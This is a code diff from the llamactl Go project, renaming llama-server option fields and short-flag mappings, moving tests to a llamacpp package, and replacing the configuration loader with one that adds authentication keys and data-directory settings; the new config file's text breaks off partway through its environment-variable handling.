+	Prio           int    `json:"prio,omitempty"`
 	Poll           int    `json:"poll,omitempty"`
 	CPUMaskBatch   string `json:"cpu_mask_batch,omitempty"`
 	CPURangeBatch  string `json:"cpu_range_batch,omitempty"`
 	CPUStrictBatch int    `json:"cpu_strict_batch,omitempty"`
-	PriorityBatch  int    `json:"priority_batch,omitempty"`
+	PrioBatch      int    `json:"prio_batch,omitempty"`
 	PollBatch      int    `json:"poll_batch,omitempty"`
 	CtxSize        int    `json:"ctx_size,omitempty"`
 	Predict        int    `json:"predict,omitempty"`
@@ -83,7 +83,7 @@ type LlamaServerOptions struct {
 	Seed        int     `json:"seed,omitempty"`
 	SamplingSeq string  `json:"sampling_seq,omitempty"`
 	IgnoreEOS   bool    `json:"ignore_eos,omitempty"`
-	Temperature float64 `json:"temperature,omitempty"`
+	Temperature float64 `json:"temp,omitempty"`
 	TopK        int     `json:"top_k,omitempty"`
 	TopP        float64 `json:"top_p,omitempty"`
 	MinP        float64 `json:"min_p,omitempty"`
@@ -110,7 +110,7 @@ type LlamaServerOptions struct {
 	JSONSchema     string `json:"json_schema,omitempty"`
 	JSONSchemaFile string `json:"json_schema_file,omitempty"`

-	// Server/Example-specific params
+	// Example-specific params
 	NoContextShift bool `json:"no_context_shift,omitempty"`
 	Special        bool `json:"special,omitempty"`
 	NoWarmup       bool `json:"no_warmup,omitempty"`
@@ -150,17 +150,15 @@ type LlamaServerOptions struct {
 	NoPrefillAssistant   bool    `json:"no_prefill_assistant,omitempty"`
 	SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"`
 	LoraInitWithoutApply bool    `json:"lora_init_without_apply,omitempty"`
-
-	// Speculative decoding params
-	DraftMax        int     `json:"draft_max,omitempty"`
-	DraftMin        int     `json:"draft_min,omitempty"`
-	DraftPMin       float64 `json:"draft_p_min,omitempty"`
-	CtxSizeDraft    int     `json:"ctx_size_draft,omitempty"`
-	DeviceDraft     string  `json:"device_draft,omitempty"`
-	GPULayersDraft  int     `json:"gpu_layers_draft,omitempty"`
-	ModelDraft      string  `json:"model_draft,omitempty"`
-	CacheTypeKDraft string  `json:"cache_type_k_draft,omitempty"`
-	CacheTypeVDraft string  `json:"cache_type_v_draft,omitempty"`
+	DraftMax             int     `json:"draft_max,omitempty"`
+	DraftMin             int     `json:"draft_min,omitempty"`
+	DraftPMin            float64 `json:"draft_p_min,omitempty"`
+	CtxSizeDraft         int     `json:"ctx_size_draft,omitempty"`
+	DeviceDraft          string  `json:"device_draft,omitempty"`
+	GPULayersDraft       int     `json:"gpu_layers_draft,omitempty"`
+	ModelDraft           string  `json:"model_draft,omitempty"`
+	CacheTypeKDraft      string  `json:"cache_type_k_draft,omitempty"`
+	CacheTypeVDraft      string  `json:"cache_type_v_draft,omitempty"`

 	// Audio/TTS params
 	ModelVocoder  string `json:"model_vocoder,omitempty"`
@@ -199,62 +197,75 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
 	// Handle alternative field names
 	fieldMappings := map[string]string{
-		// Official llama-server short forms from the documentation
-		"t":    "threads",                // -t, --threads N
-		"tb":   "threads_batch",          // -tb, --threads-batch N
-		"C":    "cpu_mask",               // -C, --cpu-mask M
-		"Cr":   "cpu_range",              // -Cr, --cpu-range lo-hi
-		"Cb":   "cpu_mask_batch",         // -Cb, --cpu-mask-batch M
-		"Crb":  "cpu_range_batch",        // -Crb, --cpu-range-batch lo-hi
-		"c":    "ctx_size",               // -c, --ctx-size N
-		"n":    "predict",                // -n, --predict, --n-predict N
-		"b":    "batch_size",             // -b, --batch-size N
-		"ub":   "ubatch_size",            // -ub, --ubatch-size N
-		"fa":   "flash_attn",             // -fa, --flash-attn
-		"e":    "escape",                 // -e, --escape
-		"dkvc": "dump_kv_cache",          // -dkvc, --dump-kv-cache
-		"nkvo": "no_kv_offload",          // -nkvo, --no-kv-offload
-		"ctk":  "cache_type_k",           // -ctk, --cache-type-k TYPE
-		"ctv":  "cache_type_v",           // -ctv, --cache-type-v TYPE
-		"dt":   "defrag_thold",           // -dt, --defrag-thold N
-		"np":   "parallel",               // -np, --parallel N
-		"dev":  "device",                 // -dev, --device <dev1,dev2,..>
-		"ot":   "override_tensor",        // --override-tensor, -ot
-		"ngl":  "gpu_layers",             // -ngl, --gpu-layers, --n-gpu-layers N
-		"sm":   "split_mode",             // -sm, --split-mode
-		"ts":   "tensor_split",           // -ts, --tensor-split N0,N1,N2,...
-		"mg":   "main_gpu",               // -mg, --main-gpu INDEX
-		"m":    "model",                  // -m, --model FNAME
-		"mu":   "model_url",              // -mu, --model-url MODEL_URL
-		"hf":   "hf_repo",                // -hf, -hfr, --hf-repo
-		"hfr":  "hf_repo",                // -hf, -hfr, --hf-repo
-		"hfd":  "hf_repo_draft",          // -hfd, -hfrd, --hf-repo-draft
-		"hfrd": "hf_repo_draft",          // -hfd, -hfrd, --hf-repo-draft
-		"hff":  "hf_file",                // -hff, --hf-file FILE
-		"hfv":  "hf_repo_v",              // -hfv, -hfrv, --hf-repo-v
-		"hfrv": "hf_repo_v",              // -hfv, -hfrv, --hf-repo-v
-		"hffv": "hf_file_v",              // -hffv, --hf-file-v FILE
-		"hft":  "hf_token",               // -hft, --hf-token TOKEN
-		"v":    "verbose",                // -v, --verbose, --log-verbose
-		"lv":   "verbosity",              // -lv, --verbosity, --log-verbosity N
-		"s":    "seed",                   // -s, --seed SEED
-		"temp": "temperature",            // --temp N
-		"l":    "logit_bias",             // -l, --logit-bias
-		"j":    "json_schema",            // -j, --json-schema SCHEMA
-		"jf":   "json_schema_file",       // -jf, --json-schema-file FILE
-		"sp":   "special",                // -sp, --special
-		"cb":   "cont_batching",          // -cb, --cont-batching
-		"nocb": "no_cont_batching",       // -nocb, --no-cont-batching
-		"a":    "alias",                  // -a, --alias STRING
-		"to":   "timeout",                // -to, --timeout N
-		"sps":  "slot_prompt_similarity", // -sps, --slot-prompt-similarity
-		"cd":   "ctx_size_draft",         // -cd, --ctx-size-draft N
-		"devd": "device_draft",           // -devd, --device-draft
-		"ngld": "gpu_layers_draft",       // -ngld, --gpu-layers-draft
-		"md":   "model_draft",            // -md, --model-draft FNAME
-		"ctkd": "cache_type_k_draft",     // -ctkd, --cache-type-k-draft TYPE
-		"ctvd": "cache_type_v_draft",     // -ctvd, --cache-type-v-draft TYPE
-		"mv":   "model_vocoder",          // -mv, --model-vocoder FNAME
+		// Common params
+		"t":             "threads",        // -t, --threads N
+		"tb":            "threads_batch",  // -tb, --threads-batch N
+		"C":             "cpu_mask",       // -C, --cpu-mask M
+		"Cr":            "cpu_range",      // -Cr, --cpu-range lo-hi
+		"Cb":            "cpu_mask_batch", // -Cb, --cpu-mask-batch M
+		"Crb":           "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
+		"c":             "ctx_size",       // -c, --ctx-size N
+		"n":             "predict",        // -n, --predict N
+		"n-predict":     "predict",        // --n-predict N
+		"b":             "batch_size",     // -b, --batch-size N
+		"ub":            "ubatch_size",    // -ub, --ubatch-size N
+		"fa":            "flash_attn",     // -fa, --flash-attn
+		"e":             "escape",         // -e, --escape
+		"dkvc":          "dump_kv_cache",  // -dkvc, --dump-kv-cache
+		"nkvo":          "no_kv_offload",  // -nkvo, --no-kv-offload
+		"ctk":           "cache_type_k",   // -ctk, --cache-type-k TYPE
+		"ctv":           "cache_type_v",   // -ctv, --cache-type-v TYPE
+		"dt":            "defrag_thold",   // -dt, --defrag-thold N
+		"np":            "parallel",       // -np, --parallel N
+		"dev":           "device",         // -dev, --device <dev1,dev2,..>
+		"ot":            "override_tensor", // --override-tensor, -ot
+		"ngl":           "gpu_layers",     // -ngl, --gpu-layers, --n-gpu-layers N
+		"n-gpu-layers":  "gpu_layers",     // --n-gpu-layers N
+		"sm":            "split_mode",     // -sm, --split-mode
+		"ts":            "tensor_split",   // -ts, --tensor-split N0,N1,N2,...
+		"mg":            "main_gpu",       // -mg, --main-gpu INDEX
+		"m":             "model",          // -m, --model FNAME
+		"mu":            "model_url",      // -mu, --model-url MODEL_URL
+		"hf":            "hf_repo",        // -hf, -hfr, --hf-repo
+		"hfr":           "hf_repo",        // -hf, -hfr, --hf-repo
+		"hfd":           "hf_repo_draft",  // -hfd, -hfrd, --hf-repo-draft
+		"hfrd":          "hf_repo_draft",  // -hfd, -hfrd, --hf-repo-draft
+		"hff":           "hf_file",        // -hff, --hf-file FILE
+		"hfv":           "hf_repo_v",      // -hfv, -hfrv, --hf-repo-v
+		"hfrv":          "hf_repo_v",      // -hfv, -hfrv, --hf-repo-v
+		"hffv":          "hf_file_v",      // -hffv, --hf-file-v FILE
+		"hft":           "hf_token",       // -hft, --hf-token TOKEN
+		"v":             "verbose",        // -v, --verbose, --log-verbose
+		"log-verbose":   "verbose",        // --log-verbose
+		"lv":            "verbosity",      // -lv, --verbosity, --log-verbosity N
+		"log-verbosity": "verbosity",      // --log-verbosity N
+
+		// Sampling params
+		"s":  "seed",             // -s, --seed SEED
+		"l":  "logit_bias",       // -l, --logit-bias
+		"j":  "json_schema",      // -j, --json-schema SCHEMA
+		"jf": "json_schema_file", // -jf, --json-schema-file FILE
+
+		// Example-specific params
+		"sp":                 "special",                // -sp, --special
+		"cb":                 "cont_batching",          // -cb, --cont-batching
+		"nocb":               "no_cont_batching",       // -nocb, --no-cont-batching
+		"a":                  "alias",                  // -a, --alias STRING
+		"embeddings":         "embedding",              // --embeddings
+		"rerank":             "reranking",              // --reranking
+		"to":                 "timeout",                // -to, --timeout N
+		"sps":                "slot_prompt_similarity", // -sps, --slot-prompt-similarity
+		"draft":              "draft-max",              // -draft, --draft-max N
+		"draft-n":            "draft-max",              // --draft-n-max N
+		"draft-n-min":        "draft_min",              // --draft-n-min N
+		"cd":                 "ctx_size_draft",         // -cd, --ctx-size-draft N
+		"devd":               "device_draft",           // -devd, --device-draft
+		"ngld":               "gpu_layers_draft",       // -ngld, --gpu-layers-draft
+		"n-gpu-layers-draft": "gpu_layers_draft",       // --n-gpu-layers-draft N
+		"md":                 "model_draft",            // -md, --model-draft FNAME
+		"ctkd":               "cache_type_k_draft",     // -ctkd, --cache-type-k-draft TYPE
+		"ctvd":               "cache_type_v_draft",     // -ctvd, --cache-type-v-draft TYPE
+		"mv":                 "model_vocoder",          // -mv, --model-vocoder FNAME
 	}

 	// Process alternative field names


@@ -1,17 +1,16 @@
-package llamactl_test
+package llamacpp_test

 import (
 	"encoding/json"
 	"fmt"
+	"llamactl/pkg/backends/llamacpp"
 	"reflect"
 	"slices"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestBuildCommandArgs_BasicFields(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Model: "/path/to/model.gguf",
 		Port:  8080,
 		Host:  "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
 func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
-		options  llamactl.LlamaServerOptions
+		options  llamacpp.LlamaServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "verbose true",
-			options: llamactl.LlamaServerOptions{
+			options: llamacpp.LlamaServerOptions{
 				Verbose: true,
 			},
 			expected: []string{"--verbose"},
 		},
 		{
 			name: "verbose false",
-			options: llamactl.LlamaServerOptions{
+			options: llamacpp.LlamaServerOptions{
 				Verbose: false,
 			},
 			excluded: []string{"--verbose"},
 		},
 		{
 			name: "multiple booleans",
-			options: llamactl.LlamaServerOptions{
+			options: llamacpp.LlamaServerOptions{
 				Verbose:   true,
 				FlashAttn: true,
 				Mlock:     false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 }

 func TestBuildCommandArgs_NumericFields(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Port:    8080,
 		Threads: 4,
 		CtxSize: 2048,
@@ -110,13 +109,13 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
 	args := options.BuildCommandArgs()

 	expectedPairs := map[string]string{
 		"--port":       "8080",
 		"--threads":    "4",
 		"--ctx-size":   "2048",
 		"--gpu-layers": "16",
-		"--temperature": "0.7",
+		"--temp":       "0.7",
 		"--top-k":      "40",
 		"--top-p":      "0.9",
 	}

 	for flag, expectedValue := range expectedPairs {
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
 }

 func TestBuildCommandArgs_ZeroValues(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Port:        0, // Should be excluded
 		Threads:     0, // Should be excluded
 		Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 }

 func TestBuildCommandArgs_ArrayFields(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Lora:               []string{"adapter1.bin", "adapter2.bin"},
 		OverrideTensor:     []string{"tensor1", "tensor2", "tensor3"},
 		DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
 }

 func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Lora:           []string{}, // Empty array should not generate args
 		OverrideTensor: []string{}, // Empty array should not generate args
 	}
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
 func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
 	// Test snake_case to kebab-case conversion
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		CtxSize:      4096,
 		GPULayers:    32,
 		ThreadsBatch: 2,
@@ -232,10 +231,10 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 		"verbose": true,
 		"ctx_size": 4096,
 		"gpu_layers": 32,
-		"temperature": 0.7
+		"temp": 0.7
 	}`

-	var options llamactl.LlamaServerOptions
+	var options llamacpp.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	tests := []struct {
 		name     string
 		jsonData string
-		checkFn  func(llamactl.LlamaServerOptions) error
+		checkFn  func(llamacpp.LlamaServerOptions) error
 	}{
 		{
 			name:     "threads alternatives",
 			jsonData: `{"t": 4, "tb": 2}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.Threads != 4 {
 					return fmt.Errorf("expected threads 4, got %d", opts.Threads)
 				}
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "context size alternatives",
 			jsonData: `{"c": 2048}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.CtxSize != 2048 {
 					return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
 				}
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "gpu layers alternatives",
 			jsonData: `{"ngl": 16}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.GPULayers != 16 {
 					return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "model alternatives",
 			jsonData: `{"m": "/path/model.gguf"}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.Model != "/path/model.gguf" {
 					return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
 				}
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "temperature alternatives",
 			jsonData: `{"temp": 0.8}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.Temperature != 0.8 {
 					return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
 				}
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			var options llamactl.LlamaServerOptions
+			var options llamacpp.LlamaServerOptions
 			err := json.Unmarshal([]byte(tt.jsonData), &options)
 			if err != nil {
 				t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
 	invalidJSON := `{"port": "not-a-number", "invalid": syntax}`

-	var options llamactl.LlamaServerOptions
+	var options llamacpp.LlamaServerOptions
 	err := json.Unmarshal([]byte(invalidJSON), &options)
 	if err == nil {
 		t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
 		"dry_sequence_breaker": [".", "!", "?"]
 	}`

-	var options llamactl.LlamaServerOptions
+	var options llamacpp.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
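The tests above pin down the flag-building contract: snake_case fields map to kebab-case flags, zero values are skipped, and array fields repeat their flag once per element. A standalone sketch of just the name-conversion rule (flagFor is illustrative; the real logic lives in BuildCommandArgs):

package main

import (
	"fmt"
	"strings"
)

// flagFor converts a snake_case option name to the kebab-case CLI flag
// the tests above expect (ctx_size -> --ctx-size).
func flagFor(field string) string {
	return "--" + strings.ReplaceAll(field, "_", "-")
}

func main() {
	for _, f := range []string{"ctx_size", "gpu_layers", "threads_batch"} {
		fmt.Println(flagFor(f))
	}
}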

View File

@@ -1,243 +0,0 @@
package llamactl
import (
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// Config represents the configuration for llamactl
type Config struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where instance logs will be stored
LogDirectory string `yaml:"log_directory"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (Config, error) {
// 1. Start with defaults
cfg := Config{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/llamactl",
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *Config, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *Config) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
cfg.Instances.LogDirectory = logDir
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Current directory (cross-platform)
locations = append(locations,
"./llamactl.yaml",
"./config.yaml",
)
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA and ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
}
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
}
// Fallback to user home
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
case "darwin":
// macOS: Use proper Application Support directories
if homeDir != "" {
locations = append(locations,
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
)
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
default:
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" && homeDir != "" {
configHome = filepath.Join(homeDir, ".config")
}
if configHome != "" {
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
}
// System config: /etc/llamactl/config.yaml
locations = append(locations, "/etc/llamactl/config.yaml")
// Additional system locations
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
if dir != "" {
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
}
}
}
}
return locations
}

pkg/config/config.go Normal file
View File

@@ -0,0 +1,367 @@
package config
import (
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
DataDir string `yaml:"data_dir"`
// Instance config directory override
InstancesDir string `yaml:"configs_dir"`
// Logs directory override
LogsDir string `yaml:"logs_dir"`
// Automatically create the data directory if it doesn't exist
AutoCreateDirs bool `yaml:"auto_create_dirs"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction of running instances
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
}
// AuthConfig contains authentication settings
type AuthConfig struct {
// Require authentication for OpenAI compatible inference endpoints
RequireInferenceAuth bool `yaml:"require_inference_auth"`
// List of keys for OpenAI compatible inference endpoints
InferenceKeys []string `yaml:"inference_keys"`
// Require authentication for management endpoints
RequireManagementAuth bool `yaml:"require_management_auth"`
// List of keys for management endpoints
ManagementKeys []string `yaml:"management_keys"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (AppConfig, error) {
// 1. Start with defaults
cfg := AppConfig{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
},
Auth: AuthConfig{
RequireInferenceAuth: true,
InferenceKeys: []string{},
RequireManagementAuth: true,
ManagementKeys: []string{},
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *AppConfig, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *AppConfig) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
}
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
if b, err := strconv.ParseBool(enableSwagger); err == nil {
cfg.Server.EnableSwagger = b
}
}
// Data config
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
cfg.Instances.DataDir = dataDir
}
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
cfg.Instances.InstancesDir = instancesDir
}
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
cfg.Instances.LogsDir = logsDir
}
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
if b, err := strconv.ParseBool(autoCreate); err == nil {
cfg.Instances.AutoCreateDirs = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
